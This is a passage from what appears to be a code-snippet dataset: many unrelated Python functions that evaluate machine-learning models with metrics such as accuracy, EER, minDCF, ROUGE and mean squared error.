acc.update(label, pred)\n return acc.get()", "def compute(self, idx, input_scores, input_names):\n title = self._legends[idx] if self._legends is not None else None\n headers = [\"\" or title, \"Dev. %s\" % input_names[0]]\n if self._eval and input_scores[1] is not None:\n headers.append(\"eval % s\" % input_names[1])\n if self._criterion == \"rr\":\n rr = bob.measure.recognition_rate(input_scores[0], self._thres[idx])\n dev_rr = \"%.1f%%\" % (100 * rr)\n raws = [[\"RR\", dev_rr]]\n if self._eval and input_scores[1] is not None:\n rr = bob.measure.recognition_rate(\n input_scores[1], self._thres[idx]\n )\n eval_rr = \"%.1f%%\" % (100 * rr)\n raws[0].append(eval_rr)\n click.echo(\n tabulate(raws, headers, self._tablefmt), file=self.log_file\n )\n elif self._criterion == \"mindcf\":\n if \"cost\" in self._ctx.meta:\n cost = self._ctx.meta.get(\"cost\", 0.99)\n threshold = (\n bob.measure.min_weighted_error_rate_threshold(\n input_scores[0][0], input_scores[0][1], cost\n )\n if self._thres is None\n else self._thres[idx]\n )\n if self._thres is None:\n click.echo(\n \"[minDCF - Cost:%f] Threshold on Development set `%s`: %e\"\n % (cost, input_names[0], threshold),\n file=self.log_file,\n )\n else:\n click.echo(\n \"[minDCF] User defined Threshold: %e\" % threshold,\n file=self.log_file,\n )\n # apply threshold to development set\n far, frr = bob.measure.farfrr(\n input_scores[0][0], input_scores[0][1], threshold\n )\n dev_far_str = \"%.1f%%\" % (100 * far)\n dev_frr_str = \"%.1f%%\" % (100 * frr)\n dev_mindcf_str = \"%.1f%%\" % (\n (cost * far + (1 - cost) * frr) * 100.0\n )\n raws = [\n [\"FAR\", dev_far_str],\n [\"FRR\", dev_frr_str],\n [\"minDCF\", dev_mindcf_str],\n ]\n if self._eval and input_scores[1] is not None:\n # apply threshold to development set\n far, frr = bob.measure.farfrr(\n input_scores[1][0], input_scores[1][1], threshold\n )\n eval_far_str = \"%.1f%%\" % (100 * far)\n eval_frr_str = \"%.1f%%\" % (100 * frr)\n eval_mindcf_str = \"%.1f%%\" % (\n (cost * 
far + (1 - cost) * frr) * 100.0\n )\n raws[0].append(eval_far_str)\n raws[1].append(eval_frr_str)\n raws[2].append(eval_mindcf_str)\n click.echo(\n tabulate(raws, headers, self._tablefmt), file=self.log_file\n )\n elif self._criterion == \"cllr\":\n cllr = bob.measure.calibration.cllr(\n input_scores[0][0], input_scores[0][1]\n )\n min_cllr = bob.measure.calibration.min_cllr(\n input_scores[0][0], input_scores[0][1]\n )\n dev_cllr_str = \"%.1f%%\" % cllr\n dev_min_cllr_str = \"%.1f%%\" % min_cllr\n raws = [[\"Cllr\", dev_cllr_str], [\"minCllr\", dev_min_cllr_str]]\n if self._eval and input_scores[1] is not None:\n cllr = bob.measure.calibration.cllr(\n input_scores[1][0], input_scores[1][1]\n )\n min_cllr = bob.measure.calibration.min_cllr(\n input_scores[1][0], input_scores[1][1]\n )\n eval_cllr_str = \"%.1f%%\" % cllr\n eval_min_cllr_str = \"%.1f%%\" % min_cllr\n raws[0].append(eval_cllr_str)\n raws[1].append(eval_min_cllr_str)\n click.echo(\n tabulate(raws, headers, self._tablefmt), file=self.log_file\n )\n else:\n title = self._legends[idx] if self._legends is not None else None\n all_metrics = self._get_all_metrics(idx, input_scores, input_names)\n headers = [\" \" or title, \"Development\"]\n rows = [\n [self.names[0], all_metrics[0][0]],\n [self.names[1], all_metrics[0][1]],\n [self.names[2], all_metrics[0][2]],\n [self.names[3], all_metrics[0][3]],\n [self.names[4], all_metrics[0][4]],\n [self.names[5], all_metrics[0][5]],\n ]\n\n if self._eval:\n # computes statistics for the eval set based on the threshold a\n # priori\n headers.append(\"Evaluation\")\n rows[0].append(all_metrics[1][0])\n rows[1].append(all_metrics[1][1])\n rows[2].append(all_metrics[1][2])\n rows[3].append(all_metrics[1][3])\n rows[4].append(all_metrics[1][4])\n rows[5].append(all_metrics[1][5])\n\n click.echo(\n tabulate(rows, headers, self._tablefmt), file=self.log_file\n )", "def eval(self):\n params = self.params\n langs = ['en', params.target_lang]\n self.encoder.eval()\n self.proj.eval()\n\n scores = OrderedDict({'epoch': self.epoch})\n\n for splt in ['valid', 'test']:\n\n for lang in langs:\n if lang == 'en' and splt == 'test' or lang != 'en' and splt == 'valid':\n continue\n lang_id = params.lang2id[lang if lang != 'jp' else 'ja']\n valid = 0\n total = 0\n\n for batch in self.get_iterator(splt, lang):\n # batch\n (sent1, len1), idx = batch\n # set max length to 256, avoid position embedding overflow and save time.\n x, lengths = truncate(sent1, len1, 256, params.eos_index)\n lang_ids = x.clone().fill_(lang_id)\n\n y = self.data[lang][splt]['y'][idx]\n\n # cuda\n x, y, lengths, lang_ids = to_cuda(x, y, lengths, lang_ids)\n\n # forward\n output = self.proj(self.encoder.get_embeddings(x, lengths, langs=lang_ids))\n predictions = output.data.max(1)[1]\n\n # update statistics\n valid += predictions.eq(y).sum().item()\n total += len(len1)\n\n # compute accuracy\n acc = 100.0 * valid / total\n scores['CLF_%s_%s_acc' % (splt, lang)] = acc\n logger.info(\"CLF - %s - %s - Epoch %i - Acc: %.1f%%\" % (splt, lang, self.epoch, acc))\n\n logger.info(\"__log__:%s\" % json.dumps(scores))\n return scores", "def evaluate(net, data_loader):\n net.reset()\n target_scores = []\n non_target_scores = []\n for data in tqdm(data_loader):\n sample_input, output = data[0], data[1]\n sample_input = whiten(sample_input)\n mask, score = gate_activation(net, sample_input)\n selected_score = score[mask]\n if selected_score.size == 0:\n xo = 0.5\n else:\n xo = np.sum(selected_score) / selected_score.size\n if output == 1:\n 
target_scores.append(xo)\n else:\n non_target_scores.append(xo)\n\n target_scores = np.array(target_scores)\n non_target_scores = np.array(non_target_scores)\n\n pmiss, pfa = rocch(target_scores, non_target_scores)\n eer = rocch2eer(pmiss, pfa)\n\n return eer", "def evaluate(self, X, y, w):\n value, prediction = self.predict(X, w)\n if self.loss == 'linear' or self.loss == 'logistic':\n Error = np.sum((value - y) ** 2)\n elif self.loss == 'perceptron':\n newY = (y > 0).astype(int) * 2 - 1 # change from (0, 1) to (-1, 1)\n tmp = - value * newY\n Error = np.sum(tmp[tmp > 0])\n elif self.loss == 'svm':\n newY = (y > 0).astype(int) * 2 - 1 # change from (0, 1) to (-1, 1)\n tmp = 1 - value * newY\n h = np.sum(tmp[tmp > 0])\n Error = np.sum(w ** 2) + self.C * h\n\n Error = Error / len(y)\n Acc = np.sum(prediction == y) / len(y)\n\n return Error, Acc", "def _compute_wedging_human_eval(\n adapter_spec: AdapterSpec, request_state: RequestState, eval_cache_path: str\n) -> List[Stat]:\n results: List[Stat] = []\n instance_first_line = request_state.instance.input.text.splitlines()[0]\n human_evaluations = _fetch_human_evaluation_results(eval_cache_path, WEDGING_HUMAN_EVAL_FILE)\n model_results = human_evaluations.get(adapter_spec.model)\n\n if not model_results:\n # Trying to evaluate a model we don't have annotations for\n return results\n\n thesis_results = model_results.get(instance_first_line)\n if not thesis_results:\n # Trying to evaluate a thesis we don't have annotations for\n return results\n\n results.extend(\n [\n Stat(MetricName(\"wedging_eval_address_intended_audience\")).add(\n np.mean(thesis_results.get(\"q1_address_audience\", []))\n ),\n Stat(MetricName(\"wedging_eval_include_intended_goal\")).add(\n np.mean(thesis_results.get(\"q2_support_goal\", []))\n ),\n Stat(MetricName(\"wedging_eval_style\")).add(np.mean(thesis_results.get(\"q3_style\", []))),\n Stat(MetricName(\"wedging_eval_divisiveness\")).add(np.mean(thesis_results.get(\"q4_divisive\", []))),\n Stat(MetricName(\"wedging_eval_toxicity\")).add(np.mean(thesis_results.get(\"q5_toxic\", []))),\n ]\n )\n\n return results", "def test_evaluate(self):\n # test normalized by 'bbox'\n pck_metric = PCKAccuracy(thr=0.5, norm_item='bbox')\n pck_metric.process(self.data_batch, self.data_samples)\n pck = pck_metric.evaluate(self.batch_size)\n target = {'PCK': 1.0}\n self.assertDictEqual(pck, target)\n\n # test normalized by 'head_size'\n pckh_metric = PCKAccuracy(thr=0.3, norm_item='head')\n pckh_metric.process(self.data_batch, self.data_samples)\n pckh = pckh_metric.evaluate(self.batch_size)\n target = {'PCKh': 1.0}\n self.assertDictEqual(pckh, target)\n\n # test normalized by 'torso_size'\n tpck_metric = PCKAccuracy(thr=0.05, norm_item=['bbox', 'torso'])\n tpck_metric.process(self.data_batch, self.data_samples)\n tpck = tpck_metric.evaluate(self.batch_size)\n self.assertIsInstance(tpck, dict)\n target = {\n 'PCK': 1.0,\n 'tPCK': 1.0,\n }\n self.assertDictEqual(tpck, target)", "def evaluate(args, dev_dataset, model):\n\n if args.dynamic_batching:\n dev_sampler = CustomBatchSampler(dev_dataset, args.dev_batch_size)\n dev_dataloader = DataLoader(\n dev_dataset,\n batch_sampler=dev_sampler,\n num_workers=0,\n collate_fn=dynamic_padding_collate_fn\n )\n else:\n dev_sampler = SequentialSampler(dev_dataset)\n dev_dataloader = DataLoader(dev_dataset, sampler=dev_sampler,\n batch_size=args.dev_batch_size, num_workers=0)\n\n model.eval()\n loss_fn = nn.CrossEntropyLoss(ignore_index=0)\n iterator = tqdm(dev_dataloader, desc=\"Evaluation\", 
smoothing=0.05)\n loss_cum = None\n num_batch = 0\n for step, batch_cpu in enumerate(iterator):\n num_batch += 1\n\n batch = tuple(t.to(args.device) for t in batch_cpu)\n inputs = {\n \"input_ids\": batch[0],\n \"attention_mask\": batch[1],\n \"token_type_ids\": batch[2],\n }\n\n with torch.no_grad():\n outputs = model(**inputs)\n\n # Calculate loss of just the question part\n q_mask = (inputs['token_type_ids'] == 2)\n masked_labels = inputs['input_ids'].masked_fill(~q_mask, 0)\n shift_labels = masked_labels[..., 1:].contiguous()\n\n lm_logits = outputs[0]\n shift_logits = lm_logits[..., : -1, :].contiguous()\n loss = loss_fn(shift_logits.view(-1, shift_logits.size(-1)),\n shift_labels.view(-1))\n\n if loss_cum is None:\n loss_cum = loss\n else:\n loss_cum += loss\n\n model.train()\n\n return loss_cum.item() / num_batch", "def evaluate(model, g, val_nid, device):\n model.eval()\n nfeat = g.ndata['features']\n labels = g.ndata['labels']\n with th.no_grad():\n pred = model.module.inference(g, nfeat, device, args.batch_size, args.num_workers)\n model.train()\n test_acc = Accuracy()\n return test_acc(th.softmax(pred[val_nid], -1), labels[val_nid].to(pred.device))", "def evaluate_model_performance():\n\n config = load_config()\n data_processor = DataProcessor()\n df_test = data_processor.create_user_click_sequence(\n start_date=config[\"test_split_date\"]\n )\n df_test[\"truths\"] = df_test[\"merchant_seq\"].apply(lambda x: list(set(x)))\n truth_dict = dict(zip(df_test[\"user_id\"], df_test[\"truths\"]))\n\n # get model\n print(\"model training...\")\n model = Merchant2VecModel()\n model.train()\n\n # compute mAP@k\n k = model.num_rec\n all_truths, all_preds = [], []\n for user_id, user_merchants in truth_dict.items():\n this_pred = model.generate_predictions(\n user_id=user_id, eval_date=config[\"test_split_date\"]\n )\n all_truths.append(user_merchants)\n all_preds.append(this_pred)\n score = mapk(all_truths, all_preds, k)\n print(\"mAP@{} for current model: {:.4f}\".format(k, score))", "def cingValidation(self): \n \n self.cingRun()\n \n self.analyseCingResults()", "def evaluate_model(model, X_test, Y_test, category_names):\n y_pred = pd.DataFrame(data = model.predict(X_test), columns = category_names)\n\n precision, recall, f1_score = [], [], []\n\n for category in category_names:\n scores = classification_report(Y_test[category], y_pred[category])\n precision.append([x for x in scores.strip().split(\"avg / total\")[1].strip().split(\" \") \n if len(x) > 0][:3][0])\n recall.append([x for x in scores.strip().split(\"avg / total\")[1].strip().split(\" \") \n if len(x) > 0][:3][1])\n \n model_metric = pd.concat([\n pd.DataFrame(data = [precision, recall], index = [\"precision\", \"recall\"], \n columns = category_names),\n (Y_test.reset_index() == y_pred.reset_index()).mean()[1:].to_frame(\"accuracy\").T\n ])\n\n for col in model_metric.columns:\n model_metric[col] = model_metric[col].astype(float)\n\n return model_metric", "def compute_metrics(self):\n pass", "def evaluate_model(model, X_train, y_train, X_test, y_test):\n model = model\n model.fit(X_train, y_train)\n\n y_pred = model.predict(X_test)\n\n report = classificationreport(y_test, y_pred, target_names= [\"0\", \"1\"], output_dict=True)\n\n return report", "def eval(self):\n # self.recognizer.eval()\n self.detector.eval()\n self.shared_conv.eval()", "def eval(model, device, validloader, loss_function, best_acc):\n model.eval()\n running_loss, total_count, total_acc, auc = 0, 0, 0, 0\n with torch.no_grad():\n for i, (input, target) in 
enumerate(validloader):\n # load data into cuda\n input, target = input.to(device), target.unsqueeze(1).to(device, dtype=torch.float)\n \n # zero gradient\n optimizer.zero_grad()\n\n if 'tworesnet' in args.model:\n mel, mfcc = input[0], mfcc[1]\n \n # forward\n predict = model(mel, mfcc)\n\n else:\n predict = model(input)\n\n loss = loss_function(predict, target)\n\n # metric\n running_loss += loss.item()\n total_acc += binary_acc(predict, target)\n total_count += predict.shape[0]\n\n auc += plot_roc_auc(y_pred=predict, y_true=target, save_dir=save_dir)\n\n total_loss = running_loss/len(validloader)\n epoch_auc = auc/len(validloader)\n accuracy = total_acc/total_count\n\n # export weight\n if accuracy>best_acc:\n torch.save(model.state_dict(), os.path.join(save_dir,'weight.pth'))\n return total_loss, accuracy, epoch_auc", "def evaluate(weights: fl.common.Weights) -> Optional[Tuple[float, float]]:\n model = models.load_model(glb.MODEL)\n model.set_weights(weights)\n model.to(DEVICE)\n testloader = torch.utils.data.DataLoader(testset, batch_size=32, shuffle=False)\n # using pytorch for central evaluation, can be tensorflow as well\n return modules.pt_test(model, testloader, device=DEVICE)", "def evaluate_model(model_name, y_true, y_pred):\n\n # Calculate performance metrics\n rmse_eval = evaluate_rmse(y_true, y_pred)\n mae_eval = evaluate_mae(y_true, y_pred) \n r2_eval = evaluate_r2(y_true, y_pred)\n\n # Print results\n print_evaluation(model_name, mae_eval, rmse_eval, r2_eval)", "def evaluate(net, dev, batcher): \n def accuracy(outputs, labels):\n correct = 0\n total = 0\n misclassified = []\n for (i, output) in enumerate(outputs):\n total += 1\n if labels[i] == output.argmax():\n correct += 1 \n return correct, total, misclassified\n val_loader = batcher(dev, 128)\n total_val_loss = 0\n correct = 0\n total = 0\n misclassified = []\n loss = torch.nn.CrossEntropyLoss() \n for data in val_loader:\n inputs = data[:,1:]\n labels = torch.clamp(data[:,0], min=0).long()\n\n val_outputs = net(inputs) \n val_loss_size = loss(val_outputs, labels)\n\n correct_inc, total_inc, misclassified_inc = accuracy(val_outputs, \n labels)\n correct += correct_inc\n total += total_inc\n misclassified += misclassified_inc\n total_val_loss += val_loss_size.data.item()\n return correct/total, misclassified", "def evaluate_model():\n\n print '\\n\\tevaluate result'\n os.system('./conlleval.pl -d \\'\\t\\' < ' + encoded_test + ' >> ' + result_file)\n print '\\t--done\\n'", "def evaluate(self):\n\n\t\t## We should be evaluating on dev dataset as well, so commenting x_test\n\t\t#self.model_score = self.model.evaluate(self.x_test, self.y_test_oh, batch_size=2048)\n\t\tself.model_score = self.model.evaluate(self.x_dev, self.y_dev_oh, batch_size=2048)\n\t\tprint(\"%s score = %f\\n\" %(self.modelName, self.model_score[1]))\n\n\t\t##Saving atucal vs predicted predictions\n\t\t##np.argmax returns the index where it see's 1 in the row\n\t\t#y_pred = np.argmax(self.model.predict(self.x_test, batch_size=2048), axis=1)\n\t\ty_pred = np.argmax(self.model.predict(self.x_dev, batch_size=2048), axis=1)\n\n\t\t## vstack will stack them in 2 rows, so we use Trasnpose to get them in column stack\n\t\t#output_predict = np.vstack((np.argmax(self.y_test_oh, axis=1), y_pred)).T\n\t\toutput_predict = np.vstack((np.argmax(self.y_dev_oh, axis=1), y_pred)).T\n\t\toutputFile = self.resultDir + \"/outputPredict.csv\" \n\t\tnp.savetxt(outputFile, output_predict, fmt=\"%5.0f\", delimiter=\",\")\n\n\t\t##Error Analysis of the 
prediction\n\t\terrorAnalysis(outputFile)\n\n\t\treturn self.model_score", "def evaluate(self, predictor_model) -> Any:\n raise NotImplementedError()", "def evaluate(self, corpus, data_source, args, criterion, iwae=False, num_importance_samples=None):\n # Turn on evaluation mode which disables dropout.\n self.eval()\n total_loss = 0\n ntokens = len(corpus)\n hidden = self.init_hidden(args.batch_size)\n for batch in data_source:\n data, targets = batch.text, batch.target\n output, hidden = self.forward(data, hidden)\n output_flat = output.view(-1, ntokens)\n total_loss += len(data) * args.batch_size * criterion(output_flat, targets.view(-1)).data\n hidden = repackage_hidden(hidden)\n return total_loss[0] / len(data_source.dataset[0].text)", "def evaluate(input_path, model_path, metrics_path):\n\n logger = logging.getLogger(__name__)\n\n logger.info(\"Loading input dataset\")\n dataset = pd.read_csv(input_path)\n\n X_eval = dataset.drop(\"Survived\", axis=1)\n y_eval = dataset[\"Survived\"]\n\n logger.info(\"Loading model\")\n model = joblib.load(model_path)\n\n logger.info(\"Calculating metrics\")\n scorer = metrics.make_scorer(metrics.mean_squared_error)\n cv_results = cross_validate(model, X=X_eval, y=y_eval, scoring=scorer, cv=5)\n\n metric_values = {\"mse\": cv_results[\"test_score\"].mean()}\n\n logger.info(f\"Writing output to {metrics_path}\")\n with open(metrics_path, \"w\") as file_:\n json.dump(metric_values, file_)", "def __evaluate_result(self):\n # Evaluate internally using cophenetic correlation coefficient.\n cpcc = self.__clusterer.calc_cophenetic_coeff()\n \n # Show evaluation through a popup window.\n popup = WarningPopup(self.__gui, 'Clustering evaluation',\n 'Cophenetic correlation coefficient : ' + str(cpcc))\n popup._start()", "def evaluate(self):\n results = dict()\n for metric in self.metrics:\n print('Evaluating clustering with metric %s' % metric)\n if metric in LABEL_METRICS.keys():\n results[metric] = LABEL_METRICS[metric](self.X, self.model.labels_)\n results['adjusted_rand_score'] = SCORE_METRICS['adjusted_rand_score'](self.Y[:, 0], self.model.labels_)\n self.results = results\n return results", "def evaluate_c(self, x, out=None, **kwargs):\n return self._base_nlp.evaluate_c(x, out=out, **kwargs)", "def evaluate(self,\n model,\n x=None,\n y=None,\n batch_size=None,\n verbose=1,\n sample_weight=None,\n steps=None,\n callbacks=None,\n **kwargs):\n raise NotImplementedError()", "def evaluateModel(model, val_data, abs_idx2word, device, batch_size):\n #modify abs_idx2word by removing pad tokens so as to correctly calculate Reouge scores\n abs_idx2word[0] = ''\n\n #data setup\n val_data.move_to(torch.device('cpu')) #keep data on cpu\n val_dataloader = data.DataLoader(val_data, batch_size=batch_size, shuffle=True, num_workers=0)\n #model instantiation\n model = model.to(device=device)\n #evaluation\n logger.debug(f'\\tModel eval on validation data...')\n r1, r2, rl = evaluate.evaluate_model(model, val_dataloader, abs_idx2word, device, print_example=True)\n logger.debug(f'\\nRouge-1 is {r1:.4f}, Rouge-2 is {r2:.4f}, and Rouge-l is {rl:.4f}')", "def train_and_eval(self):\n self.__create_indexes()\n model = None\n model = None\n if self.model == 'OMult':\n model = OMult(self.kwargs)\n elif self.model == 'ConvO':\n model = ConvO(self.kwargs)\n elif self.model == 'QMult':\n model = QMult(self.kwargs)\n elif self.model == 'ConvQ':\n model = ConvQ(self.kwargs)\n elif self.model == 'OMultBatch':\n model = OMultBatch(self.kwargs)\n elif self.model == 'ConvOBatch':\n model = 
ConvOBatch(self.kwargs)\n elif self.model == 'QMultBatch':\n model = QMultBatch(self.kwargs)\n elif self.model == 'ConvQBatch':\n model = ConvQBatch(self.kwargs)\n else:\n print(self.model, ' is not valid name')\n raise ValueError\n\n self.train(model)\n self.eval(model)", "def baseeval(model, device, val_loader, criterion, args, epoch=0):\n batch_time = AverageMeter(\"Time\", \":6.3f\")\n losses = AverageMeter(\"Loss\", \":.4f\")\n top1 = AverageMeter(\"Acc_1\", \":6.2f\")\n top5 = AverageMeter(\"Acc_5\", \":6.2f\")\n progress = ProgressMeter(\n len(val_loader), [batch_time, losses, top1, top5], prefix=\"Test: \"\n )\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n end = time.time()\n for i, data in enumerate(val_loader):\n images, target = data[0].to(device), data[1].to(device)\n\n # compute output\n output = model(images)\n loss = criterion(output, target)\n\n # measure accuracy and record loss\n acc1, acc5 = accuracy(output, target, topk=(1, 5))\n losses.update(loss.item(), images.size(0))\n top1.update(acc1[0], images.size(0))\n top5.update(acc5[0], images.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if (i + 1) % args.print_freq == 0:\n progress.display(i)\n\n progress.display(i) # print final results\n\n return top1.avg, top5.avg", "def eval_perf_total(model, X_train, y_train, X_test, y_test):\n\n y_hat_train = model.predict(X_train)\n y_hat_test = model.predict(X_test)\n \n train_mae = metrics.mean_absolute_error(y_train, y_hat_train)\n train_mse = metrics.mean_squared_error(y_train, y_hat_train)\n train_rmse = np.sqrt(metrics.mean_squared_error(y_train, y_hat_train))\n train_r = metrics.r2_score(y_train, y_hat_train)\n\n print('Evaluating Performance on Training Data:\\n')\n print(f' Train Mean Absolute Error: {train_mae:,.2f}')\n print(f' Train Mean Squared Error: {train_mse:,.2f}\\n')\n print(f'Train Root Mean Squared Error: {train_rmse:,.2f}')\n print(f'Train R-Square Value: {round(train_r,2)}')\n\n print('\\n'+'---'*25+'\\n')\n\n test_mae = metrics.mean_absolute_error(y_test, y_hat_test)\n test_mse = metrics.mean_squared_error(y_test, y_hat_test)\n test_rmse = np.sqrt(metrics.mean_squared_error(y_test, y_hat_test))\n test_r = metrics.r2_score(y_test, y_hat_test)\n\n print('Evaluating Performance on Testing Data:\\n')\n print(f' Test Mean Absolute Error: {test_mae:,.2f}')\n print(f' Test Mean Squared Error: {test_mse:,.2f}\\n')\n print(f'Test Root Mean Squared Error: {test_rmse:,.2f}')\n print(f'Test R-Square Value: {round(test_r,2)}')", "def calc_metrics(model, X, y):\n\n # Get model predictions\n y_predict_r = model.predict(X)\n\n # Calculate evaluation metrics for assesing performance of the model.\n roc = roc_auc_score(y, y_predict_r)\n acc = accuracy_score(y, y_predict_r)\n prec = precision_score(y, y_predict_r)\n rec = recall_score(y, y_predict_r)\n f1 = f1_score(y, y_predict_r)\n\n return {\"acc\": acc, \"roc\": roc, \"prec\": prec, \"rec\": rec, \"f1\": f1}", "def evaluate(clf, loader, args):\n \n res_dict = {\n 'loss' : 0,\n 'acc' : 0\n }\n clf.eval()\n\n criterion = nn.CrossEntropyLoss()\n ncorrect = 0.\n n = 0.\n for x, y in loader:\n if args.cuda:\n x = x.cuda()\n y = y.cuda()\n n += float(x.size(0))\n\n outputs = clf(x)\n\n for i in range(y.size(0)):\n _, ind = outputs[i].max(0)\n\n if torch.equal(y[i], ind):\n ncorrect +=1\n\n loss = criterion(outputs, y)\n\n res_dict['loss'] += loss\n\n res_dict['loss'] = res_dict['loss']/n\n res_dict['loss'] = res_dict['loss'][0].item()\n 
res_dict['acc'] = ncorrect/n\n clf.train()\n return res_dict", "def model_evaluate(model,x_train,n_y_array,x_val, vald_array):\n\n scores = model.evaluate(x_train, n_y_array, verbose=1)\n\n scores2 = model.evaluate(x_val, vald_array, verbose=1)\n\n\n print(\"for traininf set\")\n\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n\n print(\"%s: %.2f%%\" % (model.metrics_names[0], scores[0]))\n\n\n\n print(\"for validation set : \") \n\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores2[1]*100))\n\n print(\"%s: %.2f%%\" % (model.metrics_names[0], scores2[0]))", "def _evaluate_model(model, val_loader, criterion, epoch, num_epochs, writer, current_lr, log_every=20):\n\n # Set to eval mode\n model.eval()\n\n y_probs = []\n y_gt = []\n losses = []\n\n for i, (images, label) in enumerate(val_loader):\n\n if torch.cuda.is_available():\n images = [image.cuda() for image in images]\n label = label.cuda()\n\n output = model(images)\n\n loss = criterion(output, label)\n\n loss_value = loss.item()\n losses.append(loss_value)\n\n probas = torch.sigmoid(output)\n\n y_gt.append(int(label.item()))\n y_probs.append(probas.item())\n\n try:\n auc = metrics.roc_auc_score(y_gt, y_probs)\n except:\n auc = 0.5\n\n writer.add_scalar('Val/Loss', loss_value, epoch * len(val_loader) + i)\n writer.add_scalar('Val/AUC', auc, epoch * len(val_loader) + i)\n\n if (i % log_every == 0) & (i > 0):\n print('''[Epoch: {0} / {1} | Batch : {2} / {3} ]| Avg Val Loss {4} | Val AUC : {5} | lr : {6}'''.\n format(\n epoch + 1,\n num_epochs,\n i,\n len(val_loader),\n np.round(np.mean(losses), 4),\n np.round(auc, 4),\n current_lr\n )\n )\n\n writer.add_scalar('Val/AUC_epoch', auc, epoch + i)\n\n val_loss_epoch = np.round(np.mean(losses), 4)\n val_auc_epoch = np.round(auc, 4)\n\n return val_loss_epoch, val_auc_epoch", "def run(self):\n self.evaluate()\n self.accumulate()\n self.summarize()", "def test(eval_loader, model, criterion, epoch, device, config, tf_writer, prepare_embeddings_fn, embedder):\n\n model.eval() # eval mode disables dropout\n\n losses = AverageMeter() # cross entropy loss\n accs = AverageMeter() # accuracies\n\n # Batches\n for _, data in enumerate(eval_loader):\n\n # Perform embedding + padding\n embeddings, labels = prepare_embeddings_fn(data, embedder, device, config)\n\n # Forward prop.\n output = model(embeddings)\n\n # Perform regularization on embedding weights -- not all models support this\n if config.model.use_regularization == \"none\":\n loss = criterion(output[\"logits\"].to(device), labels)\n elif config.model.use_regularization == \"l1\":\n # Regularization on embedding weights\n emb_weights_norm = torch.norm(model.emb_weights, p=1)\n # Loss\n loss = criterion(output[\"logits\"].to(device), labels) + config.model.regularization_lambda * emb_weights_norm # scalar\n else:\n raise NotImplementedError(\"Regularization other than 'none' or 'l1' not supported\")\n\n # Find accuracy\n _, predictions = output[\"logits\"].max(dim=1) # (n_documents)\n correct_predictions = torch.eq(predictions, labels).sum().item()\n accuracy = correct_predictions / labels.size(0)\n\n # Keep track of metrics\n losses.update(loss.item(), labels.size(0))\n accs.update(accuracy, labels.size(0))\n \n try:\n for sentence in data:\n sentence.clear_embeddings()\n except:\n pass\n\n # Print eval status\n print('Evaluation:\\t'\n 'Eval Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Eval Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format(loss=losses, acc=accs), flush=True)\n\n # Log the running loss, accuracy\n 
tf_writer.add_scalar('test loss (avg. epoch)', losses.avg, epoch)\n tf_writer.add_scalar('test accuracy (avg. epoch)', accs.avg, epoch)", "def evaluate(classifier, normalizer, transformer, x, y):\n if normalizer is not None:\n x = normalizer.transform(x)\n\n if transformer is not None:\n x = transformer.transform(x)\n\n preds = classifier.predict(x)\n acc = np.sum(y == preds) / len(y)\n f1 = f1_score(y, preds, average='macro')\n\n print('Accuracy: {:.2%}'.format(acc))\n print('F1 macro: {:.3}'.format(f1))", "def evaluate(model, loss_func, dataloader, metrics):\r\n model.eval()\r\n summ = []\r\n device = utils.get_device()\r\n with torch.no_grad():\r\n for data in dataloader:\r\n sentences1, starts1, ends1, sentences2, starts2, ends2, inputY = data\r\n inputY = inputY.to(device)\r\n output_batch = model(sentences1, starts1, ends1, sentences2, starts2, ends2)\r\n loss = loss_func(output_batch, inputY)\r\n output_batch = output_batch.data.cpu().numpy()\r\n inputY = inputY.data.cpu().numpy()\r\n summary_batch = {metric: metrics[metric](\r\n output_batch, inputY) for metric in metrics}\r\n summary_batch['loss'] = loss.item()\r\n summ.append(summary_batch)\r\n # print(\"summ:{}\".format(summ))\r\n metrics_mean = {metric: np.mean([x[metric]\r\n for x in summ]) for metric in summ[0]}\r\n metrics_string = \" ; \".join(\"{}: {:05.3f}\".format(k, v)\r\n for k, v in metrics_mean.items())\r\n logging.info(\"- Eval metrics : \" + metrics_string)\r\n return metrics_mean", "def evaluate():\n global dictionary, wv\n count = 0\n # To save the scores by distance and similarity\n scores = np.zeros(6)\n similar = np.zeros(6)\n itr = len(dictionary)\n logging.info('running evaluation for {0} samples'.format(itr))\n for key in dictionary:\n progress = (count / itr) * 100\n d = dictionary[key].split('resource/')\n d = [idx.split()[0].translate(table).lower() for idx in d[1:]]\n try:\n r = np.array(list(map(lambda x: wv.get_vector(x), d)),\n dtype=np.float32)\n except KeyError:\n itr -= 1\n continue\n if np.any(np.isnan(r)):\n itr -= 1\n continue\n else:\n if r.ndim == 2:\n try:\n # Mean of vector containing all word vectors\n # obtained from abstract.\n r = r.mean(axis=0).reshape(1, -1)\n \n # Obtain the vectors for the entity\n mean_vec = mean_encoder(dictionary[key])\n mean_vec = mean_vec.reshape(1, -1) / norm(mean_vec)\n mean_dist_vec = distance_encoder(dictionary[key])\n mean_dist_vec = mean_dist_vec.reshape(1, -1)\n mean_dist_vec = mean_dist_vec / norm(mean_dist_vec)\n title_vec = title_mean(key)\n title_vec = title_vec.reshape(1, -1) / norm(title_vec)\n abstract_vec = abstract_encoder(key)\n abstract_vec = abstract_vec.reshape(1, -1)\n abstract_vec = abstract_vec / norm(abstract_vec)\n random_vec = np.random.randn(100).reshape(1, -1)\n zero_vec = np.zeros(100).reshape(1, -1)\n \n # Score the entity vectors\n scores[0] += norm(r - mean_vec)\n scores[1] += norm(r - mean_dist_vec)\n scores[2] += norm(r - title_vec)\n scores[3] += norm(r - abstract_vec)\n scores[4] += norm(r - random_vec)\n scores[5] += norm(r - zero_vec)\n similar[0] += cosine_similarity(r, mean_vec)\n similar[1] += cosine_similarity(r, mean_dist_vec)\n similar[2] += cosine_similarity(r, title_vec)\n similar[3] += cosine_similarity(r, abstract_vec)\n similar[4] += cosine_similarity(r, random_vec)\n similar[5] += cosine_similarity(r, zero_vec)\n count += 1\n print(count, end='\\r')\n except (ValueError, KeyError) as _:\n itr -= 1\n continue\n else:\n itr -= 1\n continue\n # Normalize the scores to get a better\n # comparison against the 
